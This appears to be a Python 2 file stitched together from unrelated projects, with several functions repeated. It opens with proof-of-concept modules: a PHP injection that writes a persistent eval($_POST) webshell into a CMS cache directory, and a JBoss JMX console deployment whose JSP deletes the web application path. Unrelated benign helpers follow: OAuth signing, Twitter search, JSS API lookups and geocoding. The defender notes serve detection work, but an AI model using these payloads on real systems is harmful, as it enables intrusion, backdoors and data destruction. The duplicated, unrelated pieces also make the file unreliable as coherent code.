def verify(cls, args):
    """Probe the target by making it write and serve a marker-only PHP file.

    Sends one GET to ``/admin/include/common.inc.php`` whose ``str``
    parameter carries a PHP snippet that only echoes ``md5("beebeeto")``,
    then requests ``/cache/langadmin_<name>.php`` and looks for the digest
    in the body.

    Args:
        args: framework dict. Reads ``args['options']['target']`` and
            ``args['options']['verbose']``; on a hit sets ``args['success']``
            and fills ``args['poc_ret']``.

    Returns:
        The same ``args`` dict (mutated in place).

    Defender notes: both requests appear in web access logs -- the
    ``met_admin_type_ok=1`` / ``met_langadmin[...]`` query string, followed
    by a hit on ``/cache/langadmin_<6 hex chars>.php``. Nothing here removes
    the file afterwards, so a leftover ``langadmin_*.php`` in the cache
    directory indicates the host was probed and was writable.
    NOTE(review): the ``met_`` parameter prefix suggests MetInfo CMS; the
    page does not name the product -- confirm before tagging findings.
    """
    url = args['options']['target']
    # Marker-only snippet: prints a fixed digest and does nothing else.
    payload = 'echo md5("beebeeto");//'
    # 3 random bytes rendered as 6 hex characters (Python 2 str.encode('hex'));
    # used both as the langset value and in the resulting file name.
    name = os.urandom(3).encode('hex')
    shell_url = '%s/cache/langadmin_%s.php' % (url, name)
    verify_url = (
        '%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m'
        'et_langadmin[%s][]=12345&str=%s' %
        (url, name, name, urllib2.quote(payload))
    )
    if args['options']['verbose']:
        print '[*] Request URL: ' + verify_url
    # The response is discarded and no timeout is passed, so a stalled host
    # blocks the scan here.
    requests.get(verify_url)
    if args['options']['verbose']:
        # NOTE(review): logs verify_url a second time; shell_url is
        # presumably what was meant.
        print '[*] Request SHELL: ' + verify_url
    content = requests.get(shell_url).content
    # Digest the marker snippet is expected to print -- presumably
    # md5("beebeeto"); confirm.
    if '595bb9ce8726b4b55f538d3ca0ddfd76' in content:
        args['success'] = True
        args['poc_ret']['vul_url'] = verify_url
        args['poc_ret']['test_shell'] = shell_url
    return args
def exploit(cls, args):
    """Same request sequence as the marker check, but the file stays usable.

    The PHP snippet sent in ``str`` prints ``md5("beebeeto")`` and then
    evaluates the ``bb2`` POST parameter, so the file served from
    ``/cache/langadmin_<name>.php`` is a persistent code-execution backdoor
    rather than a marker.

    Args:
        args: framework dict. Reads ``args['options']['target']`` and
            ``args['options']['verbose']``; on a hit sets ``args['success']``
            and fills ``args['poc_ret']`` with the URL and parameter name.

    Returns:
        The same ``args`` dict (mutated in place).

    Defender notes: hunt for ``cache/langadmin_*.php`` files containing
    ``eval($_POST`` and for POST requests to such paths; the initial write
    shows up as a GET to ``/admin/include/common.inc.php`` with
    ``met_admin_type_ok=1``. A host where such a file exists should be
    handled as compromised, not merely vulnerable.
    """
    url = args['options']['target']
    # Digest echo (used as the success marker) followed by an eval of the
    # bb2 POST parameter.
    payload = 'echo md5("beebeeto");@eval($_POST["bb2"]);//'
    # 3 random bytes rendered as 6 hex characters (Python 2 str.encode('hex')).
    name = os.urandom(3).encode('hex')
    shell_url = '%s/cache/langadmin_%s.php' % (url, name)
    verify_url = (
        '%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m'
        'et_langadmin[%s][]=12345&str=%s' %
        (url, name, name, urllib2.quote(payload))
    )
    if args['options']['verbose']:
        print '[*] Request URL: ' + verify_url
    # Response discarded; no timeout is passed.
    requests.get(verify_url)
    if args['options']['verbose']:
        # NOTE(review): logs verify_url a second time; shell_url is
        # presumably what was meant.
        print '[*] Request SHELL: ' + verify_url
    content = requests.get(shell_url).content
    # Digest the snippet is expected to print -- presumably md5("beebeeto");
    # confirm.
    if '595bb9ce8726b4b55f538d3ca0ddfd76' in content:
        args['success'] = True
        args['poc_ret']['vul_url'] = verify_url
        args['poc_ret']['webshell'] = shell_url
        args['poc_ret']['password'] = 'bb2'
    return args
def verify(cls, args):
    """Check for a JBoss JMX console that accepts deployment calls.

    POSTs an ``invokeOp`` request to ``/jmx-console/HtmlAdaptor`` addressed
    to ``jboss.admin:service=DeploymentFileRepository`` with the arguments
    ``test.war`` / ``test`` / ``.jsp`` and a JSP body, then looks for a
    marker string in the response to that same POST.

    Args:
        args: framework dict. Reads ``args['options']['target']`` and
            ``args['options']['verbose']``; on a hit sets ``args['success']``
            and ``args['poc_ret']['vul_url']``.

    Returns:
        The same ``args`` dict (mutated in place).

    Defender notes: the precondition is a JMX console reachable without
    authentication; restrict or remove ``/jmx-console/`` and require
    authentication on it. In logs, look for POSTs to
    ``/jmx-console/HtmlAdaptor`` with ``action=invokeOp`` naming
    ``DeploymentFileRepository``; on disk, look for an unexpected
    ``test.war`` containing ``test.jsp``.
    """
    # JSP sent as arg3: prints the web application's real path, calls
    # File.delete() on that path if it exists, then prints the marker.
    verify_code = ('\n<%@ page import="java.util.*,java.io.*" %>\n<%@ page import="'
                   'java.io.*"%>\n<%\nString path=request.getRealPath("");\nout.prin'
                   'tln(path);\nFile d=new File(path);\nif(d.exists()){\n d.delete()'
                   ';\n }\n%>\n<% out.println("this_is_not_exist_9.1314923");%>')
    # '%%' is a literal '%' after formatting, so the MBean name stays
    # URL-encoded in the form body.
    payload = ('action=invokeOp&name=jboss.admin%%3Aservice%%3DDeploymentFileRepositor'
               'y&methodIndex=5&arg0=test.war&arg1=test&arg2=.jsp&arg3=%s&arg4=True')
    verify_data = payload % urllib2.quote(verify_code)
    verify_url = args['options']['target'] + '/jmx-console/HtmlAdaptor'
    if args['options']['verbose']:
        print '[*] Request URL: ' + verify_url
    page_content = ''
    # Supplying a data argument makes urllib2 issue a POST. urlopen raises on
    # HTTP error statuses and nothing here catches that.
    request = urllib2.Request(verify_url, verify_data)
    response = urllib2.urlopen(request)
    page_content = response.read()
    # NOTE(review): the marker is searched in the reply to the invoke request
    # itself, not in a fetch of the deployed page; a console that merely
    # echoes the submitted argument could be reported as a hit -- confirm.
    if 'this_is_not_exist_9.1314923' in page_content:
        args['success'] = True
        args['poc_ret']['vul_url'] = verify_url
    return args
def verify(cls, args):
    """Probe the target by making it write and serve a marker-only PHP file.

    Sends one GET to ``/admin/include/common.inc.php`` whose ``str``
    parameter carries a PHP snippet that only echoes ``md5("beebeeto")``,
    then requests ``/cache/langadmin_<name>.php`` and looks for the digest
    in the body.

    Args:
        args: framework dict. Reads ``args['options']['target']`` and
            ``args['options']['verbose']``; on a hit sets ``args['success']``
            and fills ``args['poc_ret']``.

    Returns:
        The same ``args`` dict (mutated in place).

    Defender notes: both requests appear in web access logs -- the
    ``met_admin_type_ok=1`` / ``met_langadmin[...]`` query string, followed
    by a hit on ``/cache/langadmin_<6 hex chars>.php``. Nothing here removes
    the file afterwards, so a leftover ``langadmin_*.php`` in the cache
    directory indicates the host was probed and was writable.
    """
    url = args['options']['target']
    # Marker-only snippet: prints a fixed digest and does nothing else.
    payload = 'echo md5("beebeeto");//'
    # 3 random bytes rendered as 6 hex characters (Python 2 str.encode('hex')).
    name = os.urandom(3).encode('hex')
    shell_url = '%s/cache/langadmin_%s.php' % (url, name)
    verify_url = (
        '%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m'
        'et_langadmin[%s][]=12345&str=%s' %
        (url, name, name, urllib2.quote(payload))
    )
    if args['options']['verbose']:
        print '[*] Request URL: ' + verify_url
    # Response discarded; no timeout is passed.
    requests.get(verify_url)
    if args['options']['verbose']:
        # NOTE(review): logs verify_url a second time; shell_url is
        # presumably what was meant.
        print '[*] Request SHELL: ' + verify_url
    content = requests.get(shell_url).content
    # Digest the marker snippet is expected to print -- presumably
    # md5("beebeeto"); confirm.
    if '595bb9ce8726b4b55f538d3ca0ddfd76' in content:
        args['success'] = True
        args['poc_ret']['vul_url'] = verify_url
        args['poc_ret']['test_shell'] = shell_url
    return args
def exploit(cls, args):
    """Same request sequence as the marker check, but the file stays usable.

    The PHP snippet sent in ``str`` prints ``md5("beebeeto")`` and then
    evaluates the ``bb2`` POST parameter, so the file served from
    ``/cache/langadmin_<name>.php`` is a persistent code-execution backdoor
    rather than a marker.

    Args:
        args: framework dict. Reads ``args['options']['target']`` and
            ``args['options']['verbose']``; on a hit sets ``args['success']``
            and fills ``args['poc_ret']`` with the URL and parameter name.

    Returns:
        The same ``args`` dict (mutated in place).

    Defender notes: hunt for ``cache/langadmin_*.php`` files containing
    ``eval($_POST`` and for POST requests to such paths; the initial write
    shows up as a GET to ``/admin/include/common.inc.php`` with
    ``met_admin_type_ok=1``. A host where such a file exists should be
    handled as compromised, not merely vulnerable.
    """
    url = args['options']['target']
    # Digest echo (used as the success marker) followed by an eval of the
    # bb2 POST parameter.
    payload = 'echo md5("beebeeto");@eval($_POST["bb2"]);//'
    # 3 random bytes rendered as 6 hex characters (Python 2 str.encode('hex')).
    name = os.urandom(3).encode('hex')
    shell_url = '%s/cache/langadmin_%s.php' % (url, name)
    verify_url = (
        '%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m'
        'et_langadmin[%s][]=12345&str=%s' %
        (url, name, name, urllib2.quote(payload))
    )
    if args['options']['verbose']:
        print '[*] Request URL: ' + verify_url
    # Response discarded; no timeout is passed.
    requests.get(verify_url)
    if args['options']['verbose']:
        # NOTE(review): logs verify_url a second time; shell_url is
        # presumably what was meant.
        print '[*] Request SHELL: ' + verify_url
    content = requests.get(shell_url).content
    # Digest the snippet is expected to print -- presumably md5("beebeeto");
    # confirm.
    if '595bb9ce8726b4b55f538d3ca0ddfd76' in content:
        args['success'] = True
        args['poc_ret']['vul_url'] = verify_url
        args['poc_ret']['webshell'] = shell_url
        args['poc_ret']['password'] = 'bb2'
    return args
def verify(cls, args):
    """Check for a JBoss JMX console that accepts deployment calls.

    POSTs an ``invokeOp`` request to ``/jmx-console/HtmlAdaptor`` addressed
    to ``jboss.admin:service=DeploymentFileRepository`` with the arguments
    ``test.war`` / ``test`` / ``.jsp`` and a JSP body, then looks for a
    marker string in the response to that same POST.

    Args:
        args: framework dict. Reads ``args['options']['target']`` and
            ``args['options']['verbose']``; on a hit sets ``args['success']``
            and ``args['poc_ret']['vul_url']``.

    Returns:
        The same ``args`` dict (mutated in place).

    Defender notes: the precondition is a JMX console reachable without
    authentication; restrict or remove ``/jmx-console/`` and require
    authentication on it. In logs, look for POSTs to
    ``/jmx-console/HtmlAdaptor`` with ``action=invokeOp`` naming
    ``DeploymentFileRepository``; on disk, look for an unexpected
    ``test.war`` containing ``test.jsp``.
    """
    # JSP sent as arg3: prints the web application's real path, calls
    # File.delete() on that path if it exists, then prints the marker.
    verify_code = ('\n<%@ page import="java.util.*,java.io.*" %>\n<%@ page import="'
                   'java.io.*"%>\n<%\nString path=request.getRealPath("");\nout.prin'
                   'tln(path);\nFile d=new File(path);\nif(d.exists()){\n d.delete()'
                   ';\n }\n%>\n<% out.println("this_is_not_exist_9.1314923");%>')
    # '%%' is a literal '%' after formatting, so the MBean name stays
    # URL-encoded in the form body.
    payload = ('action=invokeOp&name=jboss.admin%%3Aservice%%3DDeploymentFileRepositor'
               'y&methodIndex=5&arg0=test.war&arg1=test&arg2=.jsp&arg3=%s&arg4=True')
    verify_data = payload % urllib2.quote(verify_code)
    verify_url = args['options']['target'] + '/jmx-console/HtmlAdaptor'
    if args['options']['verbose']:
        print '[*] Request URL: ' + verify_url
    page_content = ''
    # Supplying a data argument makes urllib2 issue a POST. urlopen raises on
    # HTTP error statuses and nothing here catches that.
    request = urllib2.Request(verify_url, verify_data)
    response = urllib2.urlopen(request)
    page_content = response.read()
    # NOTE(review): the marker is searched in the reply to the invoke request
    # itself, not in a fetch of the deployed page; a console that merely
    # echoes the submitted argument could be reported as a hit -- confirm.
    if 'this_is_not_exist_9.1314923' in page_content:
        args['success'] = True
        args['poc_ret']['vul_url'] = verify_url
    return args
def word_seg_get(data):
    """Ask the segmentation service about *data* and collect its buffers.

    The UTF-8 bytes of *data* are percent-encoded and appended to
    ``get_addres``; the reply is fetched with ``get_page``.

    Returns:
        ``{}`` when the raw reply does not contain ``SegmentResult``;
        otherwise a dict with ``"segment"`` and ``"basic"`` lists holding the
        ``buffer`` value of every non-empty entry under ``SegmentResult`` and
        ``BasicWordResult`` respectively.
    """
    raw = get_page(get_addres + urllib2.quote(data.encode("utf-8")))
    if 'SegmentResult' not in raw:
        return {}
    # The reply is decoded as GBK and re-encoded to UTF-8 before JSON parsing.
    info_dict = json.loads(raw.decode("gbk").encode("utf-8"))

    def collect(section):
        # Gather entry['buffer'] for each truthy entry that has that key.
        found = []
        if section in info_dict:
            entries = info_dict[section]
            for idx in range(0, len(entries)):
                entry = entries[idx]
                if entry and 'buffer' in entry:
                    found.append(entry['buffer'])
        return found

    segment = collect('SegmentResult')
    basic = collect('BasicWordResult')
    return {"segment": segment, "basic": basic}
def word_seg_get(data):
    """Ask the segmentation service about *data* and collect its buffers.

    The UTF-8 bytes of *data* are percent-encoded and appended to
    ``get_addres``; the reply is fetched with ``get_page``.

    Returns:
        ``{}`` when the raw reply does not contain ``SegmentResult``;
        otherwise a dict with ``"segment"`` and ``"basic"`` lists holding the
        ``buffer`` value of every non-empty entry under ``SegmentResult`` and
        ``BasicWordResult`` respectively.
    """
    raw = get_page(get_addres + urllib2.quote(data.encode("utf-8")))
    if 'SegmentResult' not in raw:
        return {}
    # The reply is decoded as GBK and re-encoded to UTF-8.
    utf8_text = raw.decode("gbk").encode("utf-8")
    # Newlines are replaced by spaces before the text reaches the JSON parser.
    flattened = utf8_text.translate(string.maketrans('\n',' '))
    info_dict = json.loads(flattened)

    def collect(section):
        # Gather entry['buffer'] for each truthy entry that has that key.
        found = []
        if section in info_dict:
            entries = info_dict[section]
            for idx in range(0, len(entries)):
                entry = entries[idx]
                if entry and 'buffer' in entry:
                    found.append(entry['buffer'])
        return found

    segment = collect('SegmentResult')
    basic = collect('BasicWordResult')
    return {"segment": segment, "basic": basic}
def word_seg_get(data):
    """Ask the segmentation service about *data* and collect its buffers.

    The UTF-8 bytes of *data* are percent-encoded and appended to
    ``get_addres``; the reply is fetched with ``get_page``.

    Returns:
        ``{}`` when the raw reply does not contain ``SegmentResult``;
        otherwise a dict with ``"segment"`` and ``"basic"`` lists holding the
        ``buffer`` value of every non-empty entry under ``SegmentResult`` and
        ``BasicWordResult`` respectively.
    """
    raw = get_page(get_addres + urllib2.quote(data.encode("utf-8")))
    if 'SegmentResult' not in raw:
        return {}
    # The reply is decoded as GBK and re-encoded to UTF-8.
    utf8_text = raw.decode("gbk").encode("utf-8")
    # Newlines are replaced by spaces before the text reaches the JSON parser.
    flattened = utf8_text.translate(string.maketrans('\n',' '))
    info_dict = json.loads(flattened)

    def collect(section):
        # Gather entry['buffer'] for each truthy entry that has that key.
        found = []
        if section in info_dict:
            entries = info_dict[section]
            for idx in range(0, len(entries)):
                entry = entries[idx]
                if entry and 'buffer' in entry:
                    found.append(entry['buffer'])
        return found

    segment = collect('SegmentResult')
    basic = collect('BasicWordResult')
    return {"segment": segment, "basic": basic}
def encode_params(self, base_url, method, params):
    """Return *params* as a query string carrying an OAuth HMAC-SHA1 signature.

    A copy of *params* is extended with the ``oauth_*`` fields, sorted and
    encoded with ``urlencode_noplus``. The signature base string is the
    percent-encoded upper-cased method, *base_url* and encoded parameters
    joined by ``&``; the HMAC key is the consumer secret, ``&`` and the
    percent-encoded token secret.

    Args:
        base_url: request URL used in the signature base string.
        method: HTTP method name; upper-cased before signing.
        params: request parameters; not modified.

    Returns:
        The encoded parameters followed by ``&oauth_signature=<signature>``.
    """
    def pct(value):
        # Percent-encode with '~' as the only extra safe character.
        return urllib_parse.quote(value, safe='~')

    signed = params.copy()
    if self.token:
        signed['oauth_token'] = self.token
    signed['oauth_consumer_key'] = self.consumer_key
    signed['oauth_signature_method'] = 'HMAC-SHA1'
    signed['oauth_version'] = '1.0'
    signed['oauth_timestamp'] = str(int(time()))
    # NOTE(review): if getrandbits comes from the random module the nonce is
    # not drawn from a CSPRNG; it only has to be unique per timestamp, but a
    # source such as os.urandom avoids predictable values -- confirm import.
    signed['oauth_nonce'] = str(getrandbits(64))
    enc_params = urlencode_noplus(sorted(signed.items()))

    # The key is built from both secrets; it must never be logged.
    signing_key = self.consumer_secret + "&" + pct(self.token_secret)
    base_string = '&'.join(
        pct(part) for part in [method.upper(), base_url, enc_params])
    # .encode('ascii') raises if either string contains non-ASCII characters.
    digest = hmac.new(
        signing_key.encode('ascii'),
        base_string.encode('ascii'),
        hashlib.sha1,
    ).digest()
    signature = base64.b64encode(digest)
    return enc_params + "&" + "oauth_signature=" + pct(signature)
def __call__(self, twitter, options):
    """Search for the terms in ``options['extra_args']`` and print each hit.

    Args:
        twitter: client object; its ``domain`` and ``uriparts`` are
            overwritten before the call.
        options: option dict; ``extra_args`` supplies the search terms and
            the whole dict is handed to the formatter.
    """
    # Search is served from its own host; repointing the client here is
    # simpler than doing it in main().
    twitter.domain = "search.twitter.com"
    twitter.uriparts = ()
    # The TwitterCall parameter encoding has to be bypassed so that the plus
    # sign is not encoded: each term is quoted here and the terms are joined
    # with a literal '+'.
    encoded_terms = [quote(term) for term in options['extra_args']]
    hits = twitter.search(q="+".join(encoded_terms))['results']
    format_hit = get_formatter('search', options)
    for hit in hits:
        text = format_hit(hit, options)
        # Skip results that render to nothing but whitespace.
        if text.strip():
            printNicely(text)
def encode_params(self, base_url, method, params):
    """Return *params* as a query string carrying an OAuth HMAC-SHA1 signature.

    A copy of *params* is extended with the ``oauth_*`` fields, sorted and
    encoded with ``urlencode_noplus``. The signature base string is the
    percent-encoded upper-cased method, *base_url* and encoded parameters
    joined by ``&``; the HMAC key is the consumer secret, ``&`` and the
    percent-encoded token secret.

    Args:
        base_url: request URL used in the signature base string.
        method: HTTP method name; upper-cased before signing.
        params: request parameters; not modified.

    Returns:
        The encoded parameters followed by ``&oauth_signature=<signature>``.
    """
    def pct(value):
        # Percent-encode with '~' as the only extra safe character.
        return urllib_parse.quote(value, safe='~')

    signed = params.copy()
    if self.token:
        signed['oauth_token'] = self.token
    signed['oauth_consumer_key'] = self.consumer_key
    signed['oauth_signature_method'] = 'HMAC-SHA1'
    signed['oauth_version'] = '1.0'
    signed['oauth_timestamp'] = str(int(time()))
    # NOTE(review): if getrandbits comes from the random module the nonce is
    # not drawn from a CSPRNG; it only has to be unique per timestamp, but a
    # source such as os.urandom avoids predictable values -- confirm import.
    signed['oauth_nonce'] = str(getrandbits(64))
    enc_params = urlencode_noplus(sorted(signed.items()))

    # The key is built from both secrets; it must never be logged.
    signing_key = self.consumer_secret + "&" + pct(self.token_secret)
    base_string = '&'.join(
        pct(part) for part in [method.upper(), base_url, enc_params])
    # .encode('ascii') raises if either string contains non-ASCII characters.
    digest = hmac.new(
        signing_key.encode('ascii'),
        base_string.encode('ascii'),
        hashlib.sha1,
    ).digest()
    signature = base64.b64encode(digest)
    return enc_params + "&" + "oauth_signature=" + pct(signature)
def __call__(self, twitter, options):
    """Search for the terms in ``options['extra_args']`` and print each hit.

    Args:
        twitter: client object; its ``domain`` and ``uriparts`` are
            overwritten before the call.
        options: option dict; ``extra_args`` supplies the search terms and
            the whole dict is handed to the formatter.
    """
    # Search is served from its own host; repointing the client here is
    # simpler than doing it in main().
    twitter.domain = "search.twitter.com"
    twitter.uriparts = ()
    # The TwitterCall parameter encoding has to be bypassed so that the plus
    # sign is not encoded: each term is quoted here and the terms are joined
    # with a literal '+'.
    encoded_terms = [quote(term) for term in options['extra_args']]
    hits = twitter.search(q="+".join(encoded_terms))['results']
    format_hit = get_formatter('search', options)
    for hit in hits:
        text = format_hit(hit, options)
        # Skip results that render to nothing but whitespace.
        if text.strip():
            printNicely(text)
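def getComputerId(computerSearch, username, password):
    """Return the id of the single computer matching *computerSearch*.

    Args:
        computerSearch: search term placed in the ``/computers/match/`` path.
        username: API user name, passed through to ``sendAPIRequest``.
        password: API password, passed through to ``sendAPIRequest``.

    Returns:
        The id text when exactly one computer matches; ``-1`` when the
        request failed or nothing matched; ``-2`` when several matched.
    """
    # safe='' percent-encodes '/' as well. quote() leaves '/' untouched by
    # default, which would let a search term add path segments and address a
    # different API resource with the caller's credentials.
    computerSearch_normalized = urllib2.quote(computerSearch, safe='')
    reqStr = jss_api_base_url + '/computers/match/' + computerSearch_normalized
    r = sendAPIRequest(reqStr, username, password, 'GET')
    if r == -1:
        return -1
    baseXml = r.read()
    # NOTE(review): which etree implementation parses this reply is not
    # visible here; confirm it does not resolve external entities.
    responseXml = etree.fromstring(baseXml)
    response_size = responseXml.find('size').text
    if response_size == '0':
        # No computer matched the search term.
        return -1
    elif response_size == '1':
        return responseXml.find('computer/id').text
    else:
        # More than one match: the caller has to narrow the search.
        return -2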
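def getMobileDeviceId(mobileDeviceName, username, password):
    """Return the id of the single mobile device matching *mobileDeviceName*.

    Args:
        mobileDeviceName: search term placed in the ``/mobiledevices/match/``
            path.
        username: API user name, passed through to ``sendAPIRequest``.
        password: API password, passed through to ``sendAPIRequest``.

    Returns:
        The id text when exactly one device matches; ``-1`` when the request
        failed or nothing matched; ``-2`` when several matched.
    """
    # safe='' percent-encodes '/' as well. quote() leaves '/' untouched by
    # default, which would let a search term add path segments and address a
    # different API resource with the caller's credentials.
    mobileDeviceName_normalized = urllib2.quote(mobileDeviceName, safe='')
    reqStr = jss_api_base_url + '/mobiledevices/match/' + mobileDeviceName_normalized
    r = sendAPIRequest(reqStr, username, password, 'GET')
    if r == -1:
        return -1
    baseXml = r.read()
    # NOTE(review): which etree implementation parses this reply is not
    # visible here; confirm it does not resolve external entities.
    responseXml = etree.fromstring(baseXml)
    response_size = responseXml.find('size').text
    if response_size == '0':
        # No mobile device matched the search term.
        return -1
    elif response_size == '1':
        return responseXml.find('mobile_device/id').text
    else:
        # More than one match: the caller has to narrow the search.
        return -2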
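def updateMobileDeviceName(mobileSearch, deviceName, username, password):
    """Build the DeviceName command for the supervised device *mobileSearch*.

    Args:
        mobileSearch: search term identifying the mobile device.
        deviceName: new device name.
        username: API user name, passed through to the lookup.
        password: API password, passed through to the lookup.

    Returns:
        ``-1`` when the device is not found, is ambiguous or is not
        supervised. The listing ends after the command URL and XML body are
        built; the request that sends them is not shown.
    """
    # Function-scope import: the file's import block is not part of this
    # listing.
    from xml.sax.saxutils import escape

    print 'Updating Mobile Device name for mobile device ' + mobileSearch + ' to ' + deviceName + '...'
    # safe='' percent-encodes '/' too, so the new name stays one path segment.
    newDeviceName_normalized = urllib2.quote(deviceName, safe='')
    mobile_id = getSupervisedMobileDeviceId(mobileSearch, username, password)
    if str(mobile_id) == '-1':
        print 'Mobile device ' + mobileSearch + ' not found, please try again.'
        return -1
    elif str(mobile_id) == '-2':
        print 'More than one mobile device matching search string ' + str(mobileSearch) + ', please try again.'
        return -1
    elif str(mobile_id) == '-3':
        print 'Device found, but is not supervised.'
        # Stop here: without this return the code below built a command
        # addressed to the sentinel value instead of a real device id.
        return -1
    postStr = jss_api_base_url + '/mobiledevicecommands/command/DeviceName/' + newDeviceName_normalized + '/id/' + mobile_id
    # escape() encodes &, < and > so a device name cannot break out of the
    # <device_name> element and add markup to the command document.
    postXML = "<mobile_device_command><command>DeviceName</command><mobile_devices><mobile_device><id>" + mobile_id + "</id><device_name>" + escape(deviceName) + "</device_name></mobile_device></mobile_devices></mobile_device_command>"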
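def getComputerGroupId(groupSearch, username, password):
    """Return the id of the computer group named *groupSearch*.

    Args:
        groupSearch: group name placed in the ``/computergroups/name/`` path.
        username: API user name, passed through to ``sendAPIRequest``.
        password: API password, passed through to ``sendAPIRequest``.

    Returns:
        The text of the ``id`` element in the reply, or ``-1`` when
        ``sendAPIRequest`` reports failure.
    """
    # safe='' percent-encodes '/' as well. quote() leaves '/' untouched by
    # default, which would let a group name add path segments and address a
    # different API resource with the caller's credentials.
    groupSearch_normalized = urllib2.quote(groupSearch, safe='')
    reqStr = jss_api_base_url + '/computergroups/name/' + groupSearch_normalized
    r = sendAPIRequest(reqStr, username, password, 'GET')
    if r == -1:
        # Request failed; the caller treats this as "group not found".
        return -1
    baseXml = r.read()
    # NOTE(review): which etree implementation parses this reply is not
    # visible here; confirm it does not resolve external entities.
    responseXml = etree.fromstring(baseXml)
    return responseXml.find('id').text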
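def rawGeocoder(self, query):
    """Geocode a free-text *query* in Argentina with the Google geocoding API.

    Args:
        query: address text; ``", Argentina"`` is appended before the lookup.

    Returns:
        A list with one dict per API result: ``nombre`` (formatted address),
        ``precision`` (number of address components divided by 6), ``geom``
        (``POINT(lng lat)`` text) and ``tipo`` (``"rawGeocoder"``).
    """
    # http://stackoverflow.com/questions/9884475/using-google-maps-geocoder-from-python-with-urllib2
    add = query + ", Argentina"
    add = urllib2.quote(add.encode('utf8'))
    # HTTPS instead of HTTP: the address being looked up is no longer sent in
    # clear text and the coordinates cannot be rewritten in transit.
    # NOTE(review): Python 2 releases before 2.7.9 do not verify the server
    # certificate in urlopen by default -- confirm the runtime version.
    geocode_url = "https://maps.googleapis.com/maps/api/geocode/json?language=es&address=%s&sensor=false" % add
    req = urllib2.urlopen(geocode_url)
    try:
        res = json.loads(req.read())
    finally:
        # Release the connection even when the body is not valid JSON.
        req.close()
    # Comprehension that parses what the Google geocoder returned.
    ret = [
        {
            'nombre'   : i["formatted_address"],
            # Integer division under Python 2.
            'precision': len(i["address_components"]) / 6,
            'geom'     : "POINT(" + str(i["geometry"]["location"]["lng"]) + " " + str(i["geometry"]["location"]["lat"]) + ")",
            'tipo'     : "rawGeocoder"
        }
        for i in res["results"]
    ]
    return ret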
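def direccionPostal(self, calle, numero, ciudad_slug):
    """Geocode a street address in Argentina with the Google geocoding API.

    Args:
        calle: street name.
        numero: street number, as text (it is concatenated to the street).
        ciudad_slug: city identifier appended to the address.

    Returns:
        A list with one dict per API result whose ``types`` include
        ``street_address``: ``nombre`` (formatted address), ``precision``
        (always 1), ``geom`` (``POINT(lng lat)`` text) and ``tipo``
        (``"direccionPostal"``).
    """
    # http://stackoverflow.com/questions/9884475/using-google-maps-geocoder-from-python-with-urllib2
    import urllib2
    import json
    add = calle + " " + numero + ", " + ciudad_slug + ", Argentina"
    add = urllib2.quote(add.encode('utf8'))
    # HTTPS instead of HTTP: the address being looked up is no longer sent in
    # clear text and the coordinates cannot be rewritten in transit.
    # NOTE(review): Python 2 releases before 2.7.9 do not verify the server
    # certificate in urlopen by default -- confirm the runtime version.
    geocode_url = "https://maps.googleapis.com/maps/api/geocode/json?language=es&address=%s&sensor=false" % add
    req = urllib2.urlopen(geocode_url)
    try:
        res = json.loads(req.read())
    finally:
        # Release the connection even when the body is not valid JSON.
        req.close()
    # Comprehension that parses what the Google geocoder returned.
    ret = [
        {
            'nombre'   : i["formatted_address"],
            'precision': 1,
            'geom'     : "POINT(" + str(i["geometry"]["location"]["lng"]) + " " + str(i["geometry"]["location"]["lat"]) + ")",
            'tipo'     : "direccionPostal"
        }
        for i in res["results"]
        if "street_address" in i["types"]
    ]
    return ret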
def get_trackid_from_text_search(title,artistname=''):
    """
    Look up a track by title (optionally prefixed with the artist name)
    through the 7digital search API.
    Return None when the reply status is not 'ok' or there is no search
    result; otherwise the tuple (title, trackid) of the first result.
    """
    # NOTE(review): the request goes over plain HTTP with the consumer key in
    # the query string, so the key is readable on the wire and in proxy logs;
    # switch to HTTPS if the endpoint offers it -- confirm.
    url = 'http://api.7digital.com/1.2/track/search?'
    url += 'oauth_consumer_key='+DIGITAL7_API_KEY
    if artistname != '':
        search_text = artistname + ' ' + title
    else:
        search_text = title
    url += '&q='+urllib2.quote(search_text)
    xmldoc = url_call(url)
    if xmldoc.getAttribute('status') != 'ok':
        return None
    matches = xmldoc.getElementsByTagName('searchResult')
    if len(matches) == 0:
        return None
    # Only the first search result is used.
    first_track = matches[0].getElementsByTagName('track')[0]
    found_title = first_track.getElementsByTagName('title')[0].firstChild.data
    found_id = int(first_track.getAttribute('id'))
    return (found_title,found_id)